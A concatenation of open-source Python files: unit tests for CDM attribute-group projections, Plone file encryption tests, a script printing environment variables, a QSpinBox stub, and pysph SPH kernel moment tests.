resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Exclude attributes: ['age', 'phoneNumber']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(3, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('address', att_group_definition.members[1].name)
self.assertEqual('email', att_group_definition.members[2].name)
@async_test
async def test_combine_ops_proj(self):
"""Test AddAttributeGroup and IncludeAttributes operations in the same projection"""
test_name = 'test_combine_ops_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Included attributes: ['age', 'phoneNumber']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup', 3)
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
# Check the attributes coming from the IncludeAttribute operation
self.assertEqual('age', resolved_entity.attributes[1].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[2].name)
@async_test
async def test_conditional_proj(self):
"""Test AddAttributeGroup operation with a 'structured' condition"""
test_name = 'test_conditional_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'referenceOnly' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Condition not met, keep attributes in flat list
self.assertEqual(5, len(resolved_entity.attributes))
self.assertEqual('name', resolved_entity.attributes[0].name)
self.assertEqual('age', resolved_entity.attributes[1].name)
self.assertEqual('address', resolved_entity.attributes[2].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[3].name)
self.assertEqual('email', resolved_entity.attributes[4].name)
resolved_entity2 = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'structured' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# Condition met, put all attributes in an attribute group
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity2.attributes, 'PersonAttributeGroup')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_conditional_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation and a condition using the object model"""
test_name = 'test_conditional_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity.
entity = ProjectionTestUtils.create_entity(corpus, local_root)
# Create a projection with a condition that states the operation should only execute when the resolution directive is 'structured'.
projection = ProjectionTestUtils.create_projection(corpus, local_root)
projection.condition = 'structured==true'
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF)
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection.
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Create an entity attribute that contains this projection and add this to the entity.
entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, 'TestEntityAttribute') # type: CdmEntityAttributeDefinition
entity_attribute.entity = projection_entity_ref
entity.attributes.append(entity_attribute)
# Create resolution options with the 'referenceOnly' directive.
res_opt = ResolveOptions(entity.in_document)
res_opt.directives = AttributeResolutionDirectiveSet({'referenceOnly'})
# Resolve the entity with 'referenceOnly'
resolved_entity_with_reference_only = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), res_opt, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
# Condition not met, keep attributes in flat list
self.assertEqual(4, len(resolved_entity_with_reference_only.attributes))
self.assertEqual('id', resolved_entity_with_reference_only.attributes[0].name)
self.assertEqual('name', resolved_entity_with_reference_only.attributes[1].name)
self.assertEqual('value', resolved_entity_with_reference_only.attributes[2].name)
self.assertEqual('date', resolved_entity_with_reference_only.attributes[3].name)
# Now resolve the entity with the 'structured' directive
res_opt.directives = AttributeResolutionDirectiveSet({'structured'})
resolved_entity_with_structured = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), res_opt, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
# Condition met, put all attributes in an attribute group
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity_with_structured.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
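The gating behavior this test exercises — the condition string `'structured==true'` deciding whether the operation runs, given the active resolution directives — can be illustrated with a toy evaluator. `condition_met` below handles only the one `<directive>==true/false` pattern used here; it is a simplification, not the CDM object model's expression engine:

```python
def condition_met(condition: str, directives: set) -> bool:
    # Toy evaluator for conditions shaped like "<directive>==true" or
    # "<directive>==false": the condition holds when the directive's
    # presence in the active set matches the expected boolean.
    name, _, expected = condition.partition("==")
    return (name in directives) == (expected == "true")
```

Resolving with `{'referenceOnly'}` leaves the attributes flat, while `{'structured'}` satisfies the condition and wraps them in the attribute group, exactly as asserted above.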
@async_test
async def test_entity_attribute(self):
"""Test resolving an entity attribute using resolution guidance"""
test_name = 'test_entity_attribute'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ 'structured' ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonInfo')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_entity_attribute_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation on an entity attribute using the object model"""
test_name = 'test_entity_attribute_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity
entity = ProjectionTestUtils.create_entity(corpus, local_root) # type: CdmEntityDefinition
# Create a projection
projection = ProjectionTestUtils.create_projection(corpus, local_root) # type: CdmProjection
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF) # type: CdmOperationAddAttributeGroup
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Create an entity attribute that contains this projection and add this to the entity
entity_attribute = corpus.make_object(CdmObjectType.ENTITY_ATTRIBUTE_DEF, 'TestEntityAttribute') # type: CdmEntityAttributeDefinition
entity_attribute.entity = projection_entity_ref
entity.attributes.append(entity_attribute)
# Resolve the entity.
resolved_entity = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), None, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
@async_test
async def test_entity_proj_using_object_model(self):
"""Test for creating a projection with an AddAttributeGroup operation on an entity definition using the object model"""
test_name = 'test_entity_proj_using_object_model'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
local_root = corpus.storage.fetch_root_folder('local')
# Create an entity
entity = ProjectionTestUtils.create_entity(corpus, local_root) # type: CdmEntityDefinition
# Create a projection
projection = ProjectionTestUtils.create_projection(corpus, local_root) # type: CdmProjection
# Create an AddAttributeGroup operation
add_att_group_op = corpus.make_object(CdmObjectType.OPERATION_ADD_ATTRIBUTE_GROUP_DEF) # type: CdmOperationAddAttributeGroup
add_att_group_op.attribute_group_name = 'PersonAttributeGroup'
projection.operations.append(add_att_group_op)
# Create an entity reference to hold this projection
projection_entity_ref = corpus.make_object(CdmObjectType.ENTITY_REF, None) # type: CdmEntityReference
projection_entity_ref.explicit_reference = projection
# Set the entity's ExtendEntity to be the projection
entity.extends_entity = projection_entity_ref
# Resolve the entity
resolved_entity = await entity.create_resolved_entity_async('Resolved_{}.cdm.json'.format(entity.entity_name), None, local_root)
# Verify correctness of the resolved attributes after running the AddAttributeGroup operation
# Original set of attributes: ['id', 'name', 'value', 'date']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup')
self.assertEqual(4, len(att_group_definition.members))
self.assertEqual('id', att_group_definition.members[0].name)
self.assertEqual('name', att_group_definition.members[1].name)
self.assertEqual('value', att_group_definition.members[2].name)
self.assertEqual('date', att_group_definition.members[3].name)
@async_test
async def test_extends_entity_proj(self):
"""Test AddAttributeGroup operation on an entity definition"""
test_name = 'test_extends_entity_proj'
entity_name = 'Child'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'ChildAttributeGroup')
self.assertEqual(5, len(att_group_definition.members))
self.assertEqual('name', att_group_definition.members[0].name)
self.assertEqual('age', att_group_definition.members[1].name)
self.assertEqual('address', att_group_definition.members[2].name)
self.assertEqual('phoneNumber', att_group_definition.members[3].name)
self.assertEqual('email', att_group_definition.members[4].name)
@async_test
async def test_multiple_op_proj(self):
"""Multiple AddAttributeGroup operations on the same projection """
test_name = 'test_multiple_op_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
# This will result in two attribute groups with the same set of attributes being generated
att_group1 = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'PersonAttributeGroup', 2) # type: CdmAttributeGroupDefinition
self.assertEqual(5, len(att_group1.members))
self.assertEqual('name', att_group1.members[0].name)
self.assertEqual('age', att_group1.members[1].name)
self.assertEqual('address', att_group1.members[2].name)
self.assertEqual('phoneNumber', att_group1.members[3].name)
self.assertEqual('email', att_group1.members[4].name)
att_group2 = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'SecondAttributeGroup', 2, 1) # type: CdmAttributeGroupDefinition
self.assertEqual(5, len(att_group2.members))
self.assertEqual('name', att_group2.members[0].name)
self.assertEqual('age', att_group2.members[1].name)
self.assertEqual('address', att_group2.members[2].name)
self.assertEqual('phoneNumber', att_group2.members[3].name)
self.assertEqual('email', att_group2.members[4].name)
@async_test
async def test_nested_proj(self):
"""Nested projections with AddAttributeGroup"""
test_name = 'test_nested_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
outer_att_group = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'OuterAttributeGroup') # type: CdmAttributeGroupDefinition
inner_att_group = ProjectionTestUtils.validate_attribute_group(self, outer_att_group.members, 'InnerAttributeGroup')
self.assertEqual(5, len(inner_att_group.members))
self.assertEqual('name', inner_att_group.members[0].name)
self.assertEqual('age', inner_att_group.members[1].name)
self.assertEqual('address', inner_att_group.members[2].name)
self.assertEqual('phoneNumber', inner_att_group.members[3].name)
self.assertEqual('email', inner_att_group.members[4].name)
@unittest.skip
@async_test
async def test_type_attribute_proj(self):
"""Test resolving a type attribute with an add attribute group operation"""
test_name = 'test_type_attribute_proj'
entity_name = 'Person'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name) # type: CdmCorpusDefinition
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, [ ])
# Original set of attributes: ['name', 'age', 'address', 'phoneNumber', 'email']
self.assertEqual(5, len(resolved_entity.attributes))
self.assertEqual('name', resolved_entity.attributes[0].name)
self.assertEqual('age', resolved_entity.attributes[1].name)
att_group_definition = ProjectionTestUtils.validate_attribute_group(self, resolved_entity.attributes, 'AddressAttributeGroup', 5, 2)
self.assertEqual('address', att_group_definition.members[0].name)
self.assertEqual('phoneNumber', resolved_entity.attributes[3].name)
self.assertEqual('email', resolved_entity.attributes[4].name)
###############################################################################
# ims/encryptedfile/tests/test_encrypt_decrypt.py (imsweb/ims.encryptedfile, MIT)
###############################################################################
import os
from plone import api
from plone.namedfile import NamedFile
from zope.component import getUtility
from . import base
from ..interfaces import IEncryptionUtility
from ..utility import DecryptionError
base_path = os.path.dirname(os.path.realpath(__file__))
class TestEncryptDecrypt(base.IntegrationTestCase):
def test_encrypt(self):
"""Test encrypt with file format 7z and zip"""
util = getUtility(IEncryptionUtility)
file_name = 'file_to_encrypt.txt'
with open(os.path.join(base_path, file_name)) as f:
file_data = NamedFile(f.read(), filename=file_name)
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt(file_data, file_format, file_name, password)
# checking the type
self.assertIsInstance(blob, NamedFile)
# zip
file_format = 'zip'
blob = util.encrypt(file_data, file_format, file_name, password)
# checking the type
self.assertIsInstance(blob, NamedFile)
def test_decrypt(self):
"""Test decrypt with file format 7z and zip"""
util = getUtility(IEncryptionUtility)
file_name = 'file_to_encrypt.txt'
with open(os.path.join(base_path, file_name)) as f:
file_data = NamedFile(f.read(), filename=file_name)
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt(file_data, file_format, file_name, password)
d_file_data, d_file_name = util.decrypt(blob, password)
# Comparing the decrypted file data to what was actually written in the file
self.assertEqual(d_file_data, b'File to be encrypted.')
self.assertEqual(d_file_name, file_name)
# zip
file_format = 'zip'
blob = util.encrypt(file_data, file_format, file_name, password)
d_file_data, d_file_name = util.decrypt(blob, password)
# Comparing the decrypted file data to what was actually written in the file
self.assertEqual(d_file_data, b'File to be encrypted.')
self.assertEqual(d_file_name, file_name)
def test_encrypt_folder_multiple(self):
"""
Test encrypt_folder_multiple with file format 7z and zip.
        Test that an error is raised when a folder with multiple files is decrypted.
"""
util = getUtility(IEncryptionUtility)
portal = api.portal.get()
obj1 = api.content.create(
type='File',
title='Test document 1',
container=portal)
obj1.file = NamedFile("Text that need encryption", filename='testfile.txt')
obj2 = api.content.create(
type='File',
title='Test document 2',
container=portal)
obj2.file = NamedFile("To the moon and back", filename='testfile2.txt')
obj3 = api.content.create(
type='File',
title='Test document 3',
container=portal)
obj3.file = NamedFile("The mars rover.!2", filename='testfile3.txt')
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt_folder_multiple(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
# error testing
with self.assertRaises(DecryptionError):
util.decrypt(blob, password)
# zip
file_format = 'zip'
blob = util.encrypt_folder_multiple(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
# error testing
with self.assertRaises(DecryptionError):
util.decrypt(blob, password)
def test_encrypt_folder_single(self):
"""
Test encrypt_folder_single with file format 7z and zip
and that a zip file is returned in both cases.
"""
util = getUtility(IEncryptionUtility)
portal = api.portal.get()
obj1 = api.content.create(
type='File',
title='Test document 1',
container=portal)
obj1.file = NamedFile("Text that needs encryption", filename='testfile.txt')
password = 'testpass'
# 7z
file_format = '7z'
blob = util.encrypt_folder_single(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
d_file_data, d_file_name = util.decrypt(blob, password)
# making sure it returns a zip file
num = len(d_file_name) - 4 # for .zip
zip_file = d_file_name[num:]
self.assertEqual(zip_file, '.zip')
# zip
file_format = 'zip'
blob = util.encrypt_folder_single(portal, file_format, password)
self.assertIsInstance(blob, NamedFile)
d_file_data, d_file_name = util.decrypt(blob, password)
# making sure it returns a zip file
num = len(d_file_name) - 4 # for .zip
zip_file = d_file_name[num:]
self.assertEqual(zip_file, '.zip')
def test_suite():
import unittest
return unittest.defaultTestLoader.loadTestsFromName(__name__)
###############################################################################
# app_store_connect_files/environ_test.py
# (VladKhol/Apple_Appstore_Data_Pipeline, MIT)
###############################################################################
import os
print(os.environ)
###############################################################################
# pineboolib/qt3_widgets/qspinbox.py (deavid/pineboo, MIT)
###############################################################################
from PyQt5 import QtWidgets
class QSpinBox(QtWidgets.QSpinBox):
pass
###############################################################################
# pysph/base/tests/test_kernel.py (nauaneed/pysph, BSD-3-Clause)
###############################################################################
import numpy as np
try:
from scipy.integrate import quad
except ImportError:
quad = None
from unittest import TestCase, main
from pysph.base.kernels import (CubicSpline, Gaussian, QuinticSpline,
SuperGaussian, WendlandQuintic,
WendlandQuinticC4, WendlandQuinticC6,
WendlandQuinticC2_1D, WendlandQuinticC4_1D,
WendlandQuinticC6_1D, get_compiled_kernel)
###############################################################################
# `TestKernelBase` class.
###############################################################################
class TestKernelBase(TestCase):
"""Base class for all kernel tests.
"""
kernel_factory = None
@classmethod
def setUpClass(cls):
cls.wrapper = get_compiled_kernel(cls.kernel_factory())
cls.kernel = cls.wrapper.kernel
cls.gradient = cls.wrapper.gradient
def setUp(self):
self.kernel = self.__class__.kernel
self.gradient = self.__class__.gradient
def check_kernel_moment_1d(self, a, b, h, m, xj=0.0):
func = self.kernel
if m == 0:
def f(x): return func(x, 0, 0, xj, 0, 0, h)
else:
def f(x): return (pow(x, m) * func(x, 0, 0, xj, 0, 0, h))
if quad is None:
kern_f = np.vectorize(f)
nx = 201
x = np.linspace(a, b, nx)
result = np.sum(kern_f(x)) * (b - a) / (nx - 1)
else:
result = quad(f, a, b)[0]
return result
def check_grad_moment_1d(self, a, b, h, m, xj=0.0):
func = self.gradient
if m == 0:
def f(x): return func(x, 0, 0, xj, 0, 0, h)[0]
else:
def f(x): return (pow(x - xj, m) * func(x, 0, 0, xj, 0, 0, h)[0])
if quad is None:
kern_f = np.vectorize(f)
nx = 201
x = np.linspace(a, b, nx)
return np.sum(kern_f(x)) * (b - a) / (nx - 1)
else:
return quad(f, a, b)[0]
def check_kernel_moment_2d(self, m, n):
x0, y0, z0 = 0.5, 0.5, 0.0
def func(x, y):
fac = pow(x - x0, m) * pow(y - y0, n)
return fac * self.kernel(x, y, 0.0, x0, y0, 0.0, 0.15)
vfunc = np.vectorize(func)
nx, ny = 101, 101
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1)
x, y = np.mgrid[0:1:nx * 1j, 0:1:nx * 1j]
result = np.sum(vfunc(x, y)) * vol
return result
def check_gradient_moment_2d(self, m, n):
x0, y0, z0 = 0.5, 0.5, 0.0
def func(x, y):
fac = pow(x - x0, m) * pow(y - y0, n)
return fac*np.asarray(self.gradient(x, y, 0.0, x0, y0, 0.0, 0.15))
vfunc = np.vectorize(func, otypes=[np.ndarray])
nx, ny = 101, 101
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1)
x, y = np.mgrid[0:1:nx * 1j, 0:1:nx * 1j]
result = np.sum(vfunc(x, y)) * vol
return result
def check_kernel_moment_3d(self, l, m, n):
x0, y0, z0 = 0.5, 0.5, 0.5
def func(x, y, z):
fac = pow(x - x0, l) * pow(y - y0, m) * pow(z - z0, n)
return fac * self.kernel(x, y, z, x0, y0, z0, 0.15)
vfunc = np.vectorize(func)
nx, ny, nz = 51, 51, 51
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1) * 1.0 / (nz - 1)
x, y, z = np.mgrid[0:1:nx * 1j, 0:1:ny * 1j, 0:1:nz * 1j]
result = np.sum(vfunc(x, y, z)) * vol
return result
def check_gradient_moment_3d(self, l, m, n):
x0, y0, z0 = 0.5, 0.5, 0.5
def func(x, y, z):
fac = pow(x - x0, l) * pow(y - y0, m) * pow(z - z0, n)
return fac * np.asarray(self.gradient(x, y, z, x0, y0, z0, 0.15))
vfunc = np.vectorize(func, otypes=[np.ndarray])
nx, ny, nz = 51, 51, 51
vol = 1.0 / (nx - 1) * 1.0 / (ny - 1) * 1.0 / (nz - 1)
x, y, z = np.mgrid[0:1:nx * 1j, 0:1:ny * 1j, 0:1:nz * 1j]
result = np.sum(vfunc(x, y, z)) * vol
return result
def check_kernel_at_origin(self, w_0):
k = self.kernel(xi=0.0, yi=0.0, zi=0.0, xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = w_0
self.assertAlmostEqual(k, expect,
msg='Kernel value %s != %s (expected)'
% (k, expect))
k = self.kernel(xi=3.0, yi=0.0, zi=0.0, xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(k, expect,
msg='Kernel value %s != %s (expected)'
% (k, expect))
g = self.gradient(xi=0.0, yi=0.0, zi=0.0,
xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(g[0], expect,
msg='Kernel value %s != %s (expected)'
% (g[0], expect))
g = self.gradient(xi=3.0, yi=0.0, zi=0.0,
xj=0.0, yj=0.0, zj=0.0, h=1.0)
expect = 0.0
self.assertAlmostEqual(g[0], expect,
msg='Kernel value %s != %s (expected)'
% (g[0], expect))
###############################################################################
# `TestCubicSpline1D` class.
###############################################################################
class TestCubicSpline1D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=1))
def test_simple(self):
self.check_kernel_at_origin(2. / 3)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 8)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 8)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 8)
def test_first_kernel_moment(self):
kh = self.wrapper.radius_scale
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 1, xj=0.0)
self.assertAlmostEqual(r, 0.0, 8)
def test_zeroth_grad_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_grad_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 0.0, 8)
# Use a non-unit h.
r = self.check_grad_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 0.0, 8)
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 0.0, 8)
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 8)
###############################################################################
# `TestCubicSpline2D` class.
###############################################################################
class TestCubicSpline2D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=2))
def test_simple(self):
self.check_kernel_at_origin(10. / (7 * np.pi))
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 7)
def test_first_kernel_moment(self):
r = self.check_kernel_moment_2d(0, 1)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_2d(1, 0)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_2d(1, 1)
self.assertAlmostEqual(r, 0.0, 7)
def test_zeroth_grad_moments(self):
r = self.check_gradient_moment_2d(0, 0)
self.assertAlmostEqual(r[0], 0.0, 7)
self.assertAlmostEqual(r[1], 0.0, 7)
def test_first_grad_moment(self):
r = self.check_gradient_moment_2d(1, 0)
self.assertAlmostEqual(r[0], -1.0, 6)
self.assertAlmostEqual(r[1], 0.0, 8)
r = self.check_gradient_moment_2d(0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 6)
r = self.check_gradient_moment_2d(1, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
###############################################################################
# `TestCubicSpline3D` class.
###############################################################################
class TestCubicSpline3D(TestKernelBase):
kernel_factory = staticmethod(lambda: CubicSpline(dim=3))
def test_simple(self):
self.check_kernel_at_origin(1. / np.pi)
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_3d(0, 0, 0)
self.assertAlmostEqual(r, 1.0, 6)
def test_first_kernel_moment(self):
r = self.check_kernel_moment_3d(0, 0, 1)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_3d(0, 1, 0)
self.assertAlmostEqual(r, 0.0, 7)
r = self.check_kernel_moment_3d(1, 0, 1)
self.assertAlmostEqual(r, 0.0, 7)
def test_zeroth_grad_moments(self):
r = self.check_gradient_moment_3d(0, 0, 0)
self.assertAlmostEqual(r[0], 0.0, 7)
self.assertAlmostEqual(r[1], 0.0, 7)
self.assertAlmostEqual(r[2], 0.0, 7)
def test_first_grad_moment(self):
r = self.check_gradient_moment_3d(1, 0, 0)
self.assertAlmostEqual(r[0], -1.0, 4)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], 0.0, 8)
r = self.check_gradient_moment_3d(0, 1, 0)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 4)
self.assertAlmostEqual(r[2], 0.0, 6)
r = self.check_gradient_moment_3d(0, 0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], -1.0, 4)
###############################################################################
# Gaussian kernel
class TestGaussian1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: Gaussian(dim=1))
def test_simple(self):
self.check_kernel_at_origin(1.0 / np.sqrt(np.pi))
def test_first_grad_moment(self):
kh = self.wrapper.radius_scale
r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
self.assertAlmostEqual(r, -1.0, 3)
def test_zeroth_kernel_moments(self):
kh = self.wrapper.radius_scale
# zero'th moment
r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 4)
# Use a non-unit h.
r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
self.assertAlmostEqual(r, 1.0, 4)
r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
self.assertAlmostEqual(r, 1.0, 4)
